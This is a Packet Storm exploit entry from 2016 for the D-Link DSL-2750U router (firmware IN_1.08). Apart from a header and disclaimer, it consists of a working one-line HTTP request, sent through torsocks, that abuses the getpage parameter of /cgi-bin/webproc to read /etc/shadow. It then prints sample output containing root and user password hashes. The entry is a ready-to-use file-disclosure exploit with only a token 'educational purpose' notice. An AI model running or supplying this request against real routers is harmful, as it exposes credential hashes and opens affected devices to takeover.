D-Link ADSL Router DSL-2750U IN_1.08 Remote File Disclosure

2016-11-09T00:00:00
ID PACKETSTORM:139632
Type packetstorm
Reporter Todor Donev
Modified 2016-11-09T00:00:00

Description

                                        
                                            `#!/bin/sh  
#   
# D-Link ADSL ROUTER DSL-2750U IN_1.08  
# Remote File Disclosure  
#  
# Modem Name: DSL-2750U  
# Firmware Version: IN_1.08  
#   
# Copyright 2016 (c) Todor Donev   
# <todor.donev at gmail.com>  
# https://www.ethical-hacker.org/  
# https://www.facebook.com/ethicalhackerorg  
#  
# Disclaimer:  
# This or previous programs is for Educational   
# purpose ONLY. Do not use it without permission.   
# The usual disclaimer applies, especially the   
# fact that Todor Donev is not liable for any   
# damages caused by direct or indirect use of the   
# information or functionality provided by these   
# programs. The author or any Internet provider   
# bears NO responsibility for content or misuse   
# of these programs or any derivatives thereof.  
# By using these programs you accept the fact   
# that any damage (dataloss, system crash,   
# system compromise, etc.) caused by the use   
# of these programs is not Todor Donev's   
# responsibility.  
#   
# Use them at your own risk!  
#  
# Thanks to Maya Hristova that support me.   
  
[todor@adamantium ~]$ torsocks GET "http://TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=wizard"  
  
# #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::  
# root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::  
# #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::  
`